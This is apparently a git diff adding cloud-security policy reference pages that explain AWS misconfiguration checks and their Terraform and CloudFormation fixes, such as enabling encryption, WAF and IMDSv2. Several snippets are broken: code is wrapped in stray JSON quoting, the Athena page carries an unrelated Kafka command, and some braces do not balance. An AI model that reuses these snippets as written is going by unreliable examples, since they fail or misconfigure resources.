+*CloudFormation* + + +* *Resource:* AWS::DAX::Cluster +* *Arguments:* Properties.SSESpecification.SSEEnabled - (Optional) Encrypt at rest options, enabled/disabled. + + +[source,yaml] +---- +{ + "Resources: + daxCluster: + Type: AWS::DAX::Cluster + Properties: + ... ++ SSESpecification: ++ SSEEnabled: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-24.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-24.adoc new file mode 100644 index 000000000..2a9a65882 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-24.adoc @@ -0,0 +1,116 @@ + +== ECR image tags are not immutable + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| cf8ebb0f-cfed-4f57-b60c-8d4a9de1e189 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECRImmutableTags.py[CKV_AWS_51] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon ECR supports immutable tags, preventing image tags from being overwritten. + +Tag immutability enables users to rely on the descriptive tags of an image as a mechanism to track and uniquely identify images. + +By setting an image tag as immutable, developers can use the tag to correlate the deployed image version with the build that produced the image. + +//// +=== Fix - Runtime + + +AWS Console + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/ecr/repositories [Amazon ECR console]. + +. Select a repository using the radio button. + +. Click Edit. + +. Enable the Tag immutability toggle. + + +CLI Command + + +To create a repository with immutable tags configured: + + +[source,shell] +---- +{ + "aws ecr create-repository +--repository-name name +--image-tag-mutability IMMUTABLE +--region us-east-2", +} +---- + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ecr_repository +* *Arguments:* image_tag_mutability - (Optional) The tag mutability setting for the repository. +Must be one of: MUTABLE or IMMUTABLE. +Defaults to MUTABLE. + + +[source,go] +---- +resource "aws_ecr_repository" "example" { + ... + name = "bar" ++ image_tag_mutability = "IMMUTABLE" +} +---- + + + +*CloudFormation* + + +* *Resource:* AWS::ECR::Repository +* *Arguments:* Properties.ImageTagMutability - (Optional) The tag mutability setting for the repository. +Must be one of: MUTABLE or IMMUTABLE. +Defaults to MUTABLE. + + +[source,yaml] +---- +Resources: + MyRepository: + Type: AWS::ECR::Repository + Properties: + ... ++ ImageTagMutability: "IMMUTABLE" +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-26.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-26.adoc new file mode 100644 index 000000000..3ba620492 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-26.adoc @@ -0,0 +1,92 @@ +== AWS resources that support tags do not have Tags + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3c8e89b8-5f3f-41a5-996e-f2b6083c3605 + +|Checkov Check ID +|CKV_AWS_CUSTOM_1 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Many AWS resources support tags. Without tags, it is difficult to organize, manage and track resources. +Tags allow you to add metadata to a resource to help identify ownership, perform cost / billing analysis, and to enrich a resource with other valuable information, such as descriptions and environment names. + +While there are many ways that tags can be used, we recommend you follow a tagging practice. +View AWS's recommended tagging best practices https://d1.awsstatic.com/whitepapers/aws-tagging-best-practices.pdf[here]. + +//// +=== Fix - Runtime + + +*AWS Console* + + +The procedure varies by resource type. +Tags can be added in the AWS console by navigating to the specific resource. +There is usually a "tags" tab in the resource view that can be used to view and modify tags. +Example to edit tags for a Security Group: + +. Navigate to the https://console.aws.amazon.com/ec2/v2/home#Home: [Amazon EC2 console]. + +. Select Security groups + +. Select a security group to edit, then click the Tags tab. + +. Click Manage tags, then Add new tag to add a tag. + +. Click Save changes. + + +CLI Command + + +The following command shows how to add tags for any resource associated with the EC2 service (in this case, a security group). +The specific command varies by resource type for non-EC2 services (e.g., RDS). +`aws ec2 create-tags --resources sg-000b51bf43c710838 --tags Key=Environment,Value=Dev` +//// + +=== Fix - Buildtime + + +*Terraform* + + +The example below shows how to tag a security group in Terraform. +The syntax is generally the same for any taggable resource type. + + +[source,go] +---- +{ + "resource "aws_security_group" "sg" { + name = "my-sg" + ... ++ tags = { ++ Environment = "dev" ++ Owner = "apps-team" ++ } +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-27.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-27.adoc new file mode 100644 index 000000000..0c08b85f5 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-27.adoc @@ -0,0 +1,100 @@ +== AWS CloudFront web distribution with AWS Web Application Firewall (AWS WAF) service disabled + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a1152fef-3480-45bf-a7dd-eb4de3ed9943 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/WAFEnabled.py[CKV_AWS_68] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +AWS WAF gives you control over how traffic reaches your applications by enabling you to create security rules. +We recommend that you enable AWS WAF for AWS Cloudfront and that you create rules that block common attack patterns, such as SQL injection, cross-site scripting, and rules that filter out specific traffic patterns that you have defined. +With AWS Cloudfront -- WAF integration enabled, you will be able to block any malicious requests made to your Cloudfront Content Delivery Network based on the criteria defined in the WAF Web Access Control List (ACL) associated with the CDN distribution. + +//// +=== Fix - Runtime + + +CloudFront Console + + + +. Log in to the CloudFront console at https://console.aws.amazon.com/cloudfront/. + +. Choose the ID for the distribution that you want to update. + +. On the General tab, click Edit. + +. On the Distribution Settings page, in the AWS WAF Web ACL list, choose the web ACL that you want to associate with this distribution. + +. If you want to disassociate the distribution from all web ACLs, choose None. ++ +If you want to associate the distribution with a different web ACL, choose the new web ACL. + +. Click Yes, Edit. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudfront_distribution +* *Arguments:* web_acl_id (Optional) - If you're using AWS WAF to filter CloudFront requests, the Id of the AWS WAF web ACL that is associated with the distribution. + +The WAF Web ACL must exist in the WAF Global (CloudFront) region and the credentials configuring this argument must have waf:GetWebACL permissions assigned. +If using WAFv2, provide the ARN of the web ACL. + + +[source,go] +---- +resource "aws_cloudfront_distribution" "example" { + ... + enabled = true + is_ipv6_enabled = false ++ web_acl_id = aws_wafv2_web_acl.example.id + ... +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::CloudFront::Distribution +* *Arguments:* Properties.DistributionConfig.WebACLId + + +[source,yaml] +---- +Type: 'AWS::CloudFront::Distribution' + Properties: + ... + DistributionConfig: + ... + WebACLId: arn:aws:wafv2:us-east-1:123456789012:global/webacl/ExampleWebACL/12345 +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-28.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-28.adoc new file mode 100644 index 000000000..82420bdff --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-28.adoc @@ -0,0 +1,94 @@ + +== DocumentDB is not encrypted at rest + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 08e1e43c-e9e3-40a2-8201-65147b3a9dfd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBEncryption.py[CKV_AWS_74] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + + +AWS DocumentDB clusters encryption at rest provides an additional layer of data protection by helping secure your data against unauthorized access to the underlying storage. On a cluster running with Amazon DocumentDB encryption, data stored at rest in the underlying storage is encrypted, as are its automated backups, snapshots, and replicas in the same cluster. We recommend enabling encryption at rest. + +//// +=== Fix - Runtime + + +Procedure + + + +. Create an Amazon DocumentDB cluster. + +. Under the Authentication section, choose Show advanced settings. + +. Scroll down to the Encryption-at-rest section. + +. Choose the option that you want for encryption at rest. ++ +Whichever option you choose, you can't change it after the cluster is created. ++ +To encrypt data at rest in this cluster, choose Enable encryption. + + +CLI Command + + + + +[source,go] +---- +{ + "aws docdb create-db-cluster \\ + --db-cluster-identifier sample-cluster \\ + --port 27017 \\ + --engine docdb \\ + --master-username yourMasterUsername \\ + --master-user-password yourMasterPassword \\ + --storage-encrypted", +} +---- + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_docdb_cluster +* *Arguments:* storage_encrypted - Specifies whether the DB cluster is encrypted. + + +[source,go] +---- +resource "aws_docdb_cluster" "example" { + ... + cluster_identifier = "docdb-cluster-demo" ++ storage_encrypted = true + ... +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-29.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-29.adoc new file mode 100644 index 000000000..0eb5a1f91 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-29.adoc @@ -0,0 +1,84 @@ + +== Athena Database is not encrypted at rest + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0f8ad1a1-47e9-4336-a582-2d6dcf63bf95 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py[CKV_AWS_77] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + + +AWS Athena is a query service managed by AWS that uses standard SQL to analyze data directly in Amazon S3. +Encryption of data while in transit between Amazon Athena and S3 is provided by default using SSL/TLS, but encryption of query results at rest is not enabled by default. +Athena encryption at rest provides an additional layer of data protection by helping secure your data against unauthorized access to the underlying Amazon S3 storage. We recommend enabling encryption at rest. + +//// +=== Fix - Runtime + + +AWS Console + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the Amazon Athena console. + +. In the Athena console, choose Settings. + +. Choose Encrypt query results. + +. For Encryption select either CSE-KMS, SSE-KMS, or SSE-S3. + +. If your account has access to an existing AWS KMS customer managed key (CMK), choose its alias or choose Enter a KMS key ARN, then enter an ARN. + +. Click Save. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_athena_database +* *Arguments:* encryption_configuration - (Optional) The encryption key block AWS Athena uses to decrypt the data in S3, such as an AWS Key Management Service (AWS KMS) key. + +An encryption_configuration block is documented below. + + +[source,go] +---- +resource "aws_athena_database" "example" { + ... + name = "database_name" ++ encryption_configuration { ++ encryption_option = var.encryption_option ++ kms_key = var.kms_key_arn ++ } + ... +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-30.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-30.adoc new file mode 100644 index 000000000..4daf2e569 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-30.adoc @@ -0,0 +1,92 @@ + +== CodeBuild project encryption is disabled + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1d84f4c4-fc12-40e5-9b65-44c05b7dafc3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py[CKV_AWS_78] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + + +AWS CodeBuild is a fully managed build service in the cloud, that compiles source code, runs unit tests, and produces artifacts that are ready to deploy. + +We recommend enabling CodeBuild project encryption to protect sensitive information such as passwords and other credentials required to access external services during the build process, from security breaches. + +NOTE: Build artifacts, such as a cache, logs, exported raw test report data files, and build results are encrypted by default using CMKs for Amazon S3 that are managed by the AWS Key Management Service. + +If you do not want to use these CMKs, you must create and configure a customer-managed CMK. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_codebuild_project +* *Arguments:* encryption_disabled - (Optional) If set to true, output artifacts will not be encrypted. + +If type is set to NO_ARTIFACTS then this value will be ignored. +Defaults to false. +To fix, either set to false or remove attribute. + + +[source,go] +---- +resource "aws_codebuild_project" "project-with-cache" { + ... + name = "test-project-cache" + artifacts { ++ encryption_disabled = false + } + ... +} +---- + + + +*CloudFormation* + + +* *Resource:* AWS::CodeBuild::Project +* *Arguments:* Properties.Artifacts - (Optional) If set to true, output artifacts will not be encrypted. + +If type is set to NO_ARTIFACTS then this value will be ignored. +Defaults to false. + + +[source,yaml] +---- +Resources: + CodeBuildProject: + Type: AWS::CodeBuild::Project + Properties: + ... + Artifacts: + ... + Type: S3 +- EncryptionDisabled: True ++ EncryptionDisabled: False +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-31.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-31.adoc new file mode 100644 index 000000000..e36e50e51 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-31.adoc @@ -0,0 +1,107 @@ +== AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 32f75d19-c34d-4ec5-aa8c-675959db3aad + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py[CKV_AWS_79] + +|Severity +|MEDIUM + +|Subtype +|Build, +//Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +The Instance Metadata Service (IMDS) is an on-instance component used by code on the instance to securely access instance metadata. + +You can access instance metadata from a running instance using one of the following methods: + +* Instance Metadata Service Version 1 (IMDSv1) -- a request/response method +* Instance Metadata Service Version 2 (IMDSv2) -- a session-oriented method + +As a request/response method IMDSv1 is prone to local misconfigurations: + +* Open proxies, open NATs and routers, server-side reflection vulnerabilities. +* One way or another, local software might access local-only data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_instance +* *Arguments:* http_tokens - (Optional) Whether or not the metadata service requires session tokens, the mechanism used for Instance Metadata Service Version 2. + +Can be "optional" or "required". +(Default: "optional"). +*Set to "required" to enable Instance Metadata Service V2.* +Alternatively, disable the metadata service altogether by setting `http_endpoint = "disabled"`. + + +[source,go] +---- +{ + "resource "aws_instance" "example" { + ... + instance_type = "t2.micro" ++ metadata_options { + ... ++ http_endpoint = "enabled" ++ http_tokens = "required" ++ } + ... +}", + +} +---- + +If setting `http_tokens = "required"` in a launch template that is being used for a EKS worker/node group, you should consider setting the `http_put_response_hop_limit = 2` per the https://aws.amazon.com/about-aws/whats-new/2020/08/amazon-eks-supports-ec2-instance-metadata-service-v2/[default behavior in EKS]. +Without this setting the default service account in EKS will not be able to access the instance metadata service. + + +*CloudFormation* + + +* *Resource:* AWS::EC2::LaunchTemplate +* *Arguments:* Properties.MetadataOptions.HttpEndpoint / Properties.MetadataOptions.HttpTokens + + +[source,yaml] +---- +Resources: + IMDSv1Disabled: + Type: AWS::EC2::LaunchTemplate + Properties: + ... + LaunchTemplateData: + ... ++ MetadataOptions: ++ HttpEndpoint: disabled + + IMDSv2Enabled: + Type: AWS::EC2::LaunchTemplate + Properties: + ... + LaunchTemplateData: + ... ++ MetadataOptions: ++ HttpTokens: required +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-32.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-32.adoc new file mode 100644 index 000000000..09406c340 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-32.adoc @@ -0,0 +1,87 @@ +== MSK cluster encryption at rest and in transit is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 33a02806-aa4b-4c6a-b753-3f7de6e6313c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py[CKV_AWS_81] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon MSK integrates with AWS Key Management Service (KMS) for server-side encryption. +When you create an MSK cluster, you can specify the AWS KMS CMK for Amazon MSK to use to encrypt your data at rest. +If you don't specify a CMK, Amazon MSK creates an AWS managed CMK for you and uses it on your behalf. +We recommend using encryption in transit and at rest to secure your managed Kafka queue. + +//// +=== Fix - Runtime + + +CLI Command + + +Run the create-cluster command and use the encryption-info option to point to the file where you saved your configuration JSON. + + +[source,shell] +---- +{ + "aws kafka create-cluster +--cluster-name "ExampleClusterName" +--broker-node-group-info file://brokernodegroupinfo.json +--encryption-info file://encryptioninfo.json +--kafka-version "2.2.1" +--number-of-broker-nodes 3", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_msk_cluster +* *Arguments:* encryption_info - (Optional) Configuration block for specifying encryption. +encryption_in_transit - (Optional) Configuration block to specify encryption in transit. + +See below. + + +[source,go] +---- +resource "aws_msk_cluster" "example" { + cluster_name = "example" + ... + + encryption_info { + + encryption_at_rest_kms_key_arn = aws_kms_key.kms.arn + + + + encryption_in_transit { + + client_broker = "TLS" + + in_cluster = true + + } + + } + ... +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-33.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-33.adoc new file mode 100644 index 000000000..175481e87 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-33.adoc @@ -0,0 +1,120 @@ +== Athena workgroup does not prevent disabling encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e185eb37-795d-4cbc-84ac-e9f1cfa99739 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py[CKV_AWS_82] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +You can configure settings at the workgroup level, enforce control over the workgroup. +This only affects you if you run queries in the workgroup; +if you do, workgroup settings are used. +If a query runs in a workgroups and the workgroup overrides client-side settings, Athena uses the workgroup's settings for encryption. +It also overrides any other settings specified for the query in the console, by using API operations, or with drivers. + +//// +=== Fix - Runtime + + +CLI Command + + +Run the create-cluster command and use the encryption-info option to point to the file where you saved your configuration JSON. + + +[source,shell] +---- +{ + "aws kafka create-cluster +--cluster-name "ExampleClusterName" +--broker-node-group-info file://brokernodegroupinfo.json +--encryption-info file://encryptioninfo.json +--kafka-version "2.2.1" +--number-of-broker-nodes 3", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_athena_workgroup +* *Arguments:* enforce_workgroup_configuration - (Optional) Boolean whether the settings for the workgroup override client-side settings. + +For more information, see Workgroup Settings Override Client-Side Settings. +Defaults to true. + + +[source,go] +---- +{ + "resource "aws_athena_workgroup" "example" { + name = "example" + ... + configuration { + enforce_workgroup_configuration = true + publish_cloudwatch_metrics_enabled = true + + result_configuration { + output_location = "s3://{aws_s3_bucket.example.bucket}/output/" + + encryption_configuration { + encryption_option = "SSE_KMS" + kms_key_arn = aws_kms_key.example.arn + } + + } + } + +} +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Athena::WorkGroup +* *Arguments:* Properties.WorkGroupConfiguration.EnforceWorkGroupConfiguration + + +[source,yaml] +---- +{ + "Resources: + MyAthenaWorkGroup: + Type: AWS::Athena::WorkGroup + Properties: + ... ++ WorkGroupConfiguration: ++ EnforceWorkGroupConfiguration: true + ... +", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-37.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-37.adoc new file mode 100644 index 000000000..3ca09aca2 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-37.adoc @@ -0,0 +1,98 @@ +== Glue Data Catalog encryption is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e2dd25ba-7500-4de9-8a71-903cf1e7542f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py[CKV_AWS_94] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +This examines the resource *aws_glue_data_catalog_encryption_settings* and checks that encryption is set up. +The properties *encrypted_at_rest* and *connection_encrypted* in the blocks *connection_password_encryption* and *encryption_at_rest* are examined. + +//// +=== Fix - Runtime + + +AWS Console + + +TBA + + +CLI Command +//// + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource* aws_glue_data_catalog_encryption_settings +* *Arguments* data_catalog_encryption_settings\connection_password_encryption and data_catalog_encryption_settings\encryption_at_rest blocks + + +[source,go] +---- +resource "aws_glue_data_catalog_encryption_settings" "example" { + ... ++ data_catalog_encryption_settings { ++ connection_password_encryption { ++ aws_kms_key_id = aws_kms_key.glue.arn ++ return_connection_password_encrypted = true ++ } ++ encryption_at_rest { ++ catalog_encryption_mode = "SSE-KMS" ++ sse_aws_kms_key_id = aws_kms_key.glue.arn ++ } ++ } + ... +} +---- + + +*CloudFormation* + + +* *Resource* AWS::Glue::DataCatalogEncryptionSettings +* *Arguments* Properties.DataCatalogEncryptionSettings + + +[source,yaml] +---- +Resources: + Example: + Type: 'AWS::Glue::DataCatalogEncryptionSettings' + Properties: + ... + DataCatalogEncryptionSettings: + ConnectionPasswordEncryption: + ... ++ ReturnConnectionPasswordEncrypted: True + EncryptionAtRest: + ... ++ CatalogEncryptionMode: "SSE-KMS" +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-38.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-38.adoc new file mode 100644 index 000000000..0962dc95b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-38.adoc @@ -0,0 +1,90 @@ +== Not all data stored in Aurora is securely encrypted at rest + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 98037c30-939b-474b-aa61-b1f8ef9bc6a2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AuroraEncryption.py[CKV_AWS_96] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +This policy examines the resource *aws_rds_cluster* to check that encryption is set up. +The property *storage_encrypted* is examined. + +//// +=== Fix - Runtime + + +AWS Console + + +TBA + + +CLI Command + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_rds_cluster +* *Arguments:* storage_encrypted + + +[source,go] +---- +{ + "resource "aws_rds_cluster" "example" { + ... + cluster_identifier = "aurora-cluster-demo" ++ storage_encrypted = true + ... +}", + + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::RDS::DBCluster +* *Arguments:* Properties.StorageEncrypted + + +[source,yaml] +---- +Resources: + Aurora: + Type: 'AWS::RDS::DBCluster' + Properties: + ... + Engine: 'aurora' ++ StorageEncrypted: true + ... +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-39.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-39.adoc new file mode 100644 index 000000000..10666ca97 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-39.adoc @@ -0,0 +1,88 @@ +== EFS volumes in ECS task definitions do not have encryption in transit enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 880174a9-71c2-499e-a1a1-09f88106f7dc + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py[CKV_AWS_97] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +This check examines ECS tasks, and checks the definitions for EFS and if attached that the transit is encrypted. + +//// +=== Fix - Runtime + + +AWS Console + + +TBA +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ecs_task_definition +* *Arguments:* efs_volume_configuration/transit_encryption needs to ENABLED if there is an attached EFS. + + +[source,go] +---- +resource "aws_ecs_task_definition" "example" { + ... + family = "service" + volume { + ... ++ transit_encryption = "ENABLED" + } + } + } + ... +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ECS::TaskDefinition +* *Arguments:* Properties.Volumes.EFSVolumeConfiguration.TransitEncryption.EFSVolumeConfiguration needs to ENABLED if there is an attached EFS. + + +[source,yaml] +---- +Resources: + TaskDefinition: + Type: AWS::ECS::TaskDefinition + Properties: + ... + Volumes: + - ... + EFSVolumeConfiguration: + ... ++ TransitEncryption: "ENABLED" +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-40.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-40.adoc new file mode 100644 index 000000000..61dc3ea93 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-40.adoc @@ -0,0 +1,74 @@ +== AWS SageMaker endpoint not configured with data encryption at rest using KMS key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f63b99e7-f844-4873-8292-61c7159f73d1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py[CKV_AWS_98] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This is a straight-forward check to ensure data encryption for Sagemaker notebooks, this check verifies that the cluster is encrypted with a Customer managed Key (CMK). + +//// +=== Fix - Runtime + + +AWS Console + + +There is no current way of enabling encryption on an existing notebook, it will need to be recreated. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_sagemaker_endpoint_configuration +* *Arguments:* kms_key_arn, specifying a KMS key will ensure data encryption. +This modification will result in the resource being recreated. + + +[source,go] +---- +{ + "resource "aws_sagemaker_endpoint_configuration" "example" { + ... + name = "my-endpoint-config" ++ kms_key_arn = aws_kms_key.examplea.arn + production_variants { + variant_name = "variant-1" + model_name = aws_sagemaker_model.examplea.name + initial_instance_count = 1 + instance_type = "ml.t2.medium" + } + + ... +}", + + +} +---- + diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-41.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-41.adoc new file mode 100644 index 000000000..34d6cc930 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-41.adoc @@ -0,0 +1,105 @@ +== AWS Glue security configuration encryption is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 348170ea-b358-49bd-adf1-f30f5665b9ae + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py[CKV_AWS_99] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Ensure that AWS Glue has encryption enabled. +AWS glue has three possible components that could be encrypted: Cloudwatch, job bookmarks and S3 buckets. +This check ensures that each is set correctly. + +//// +=== Fix - Runtime + + +AWS Console + + +TBA +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_glue_security_configuration +* *Arguments:* encryption_configuration, job_bookmarks_encryption, s3_encryption + + +[source,go] +---- +resource "aws_glue_security_configuration" "test" { + name = "example" + ... ++ encryption_configuration { ++ cloudwatch_encryption { ++ cloudwatch_encryption_mode = "SSE-KMS" ++ kms_key_arn = aws_kms_key.example.arn ++ } + ++ job_bookmarks_encryption { ++ job_bookmarks_encryption_mode = "CSE-KMS" ++ kms_key_arn = aws_kms_key.example.arn ++ } + ++ s3_encryption { ++ kms_key_arn = aws_kms_key.example.arn ++ s3_encryption_mode = "SSE-KMS" ++ } ++ } +} +---- + + + +*CloudFormation* + + +* *Resource:* AWS::Glue::SecurityConfiguration +* *Arguments:* Properties.EncryptionConfiguration + + +[source,yaml] +---- +Resources: + Resource0: + Type: AWS::Glue::SecurityConfiguration + Properties: + ... + EncryptionConfiguration: + CloudWatchEncryption: ++ CloudWatchEncryptionMode: SSE-KMS #any value but 'DISABLED' + ... + JobBookmarksEncryption: ++ JobBookmarksEncryptionMode: CSE-KMS #any value but 'DISABLED' + ... + S3Encryptions: ++ S3EncryptionMode: SSE-KMS #any value but 'DISABLED' + ...s +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-42.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-42.adoc new file mode 100644 index 000000000..c28a37f8c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-42.adoc @@ -0,0 +1,78 @@ +== Neptune cluster instance is publicly available + 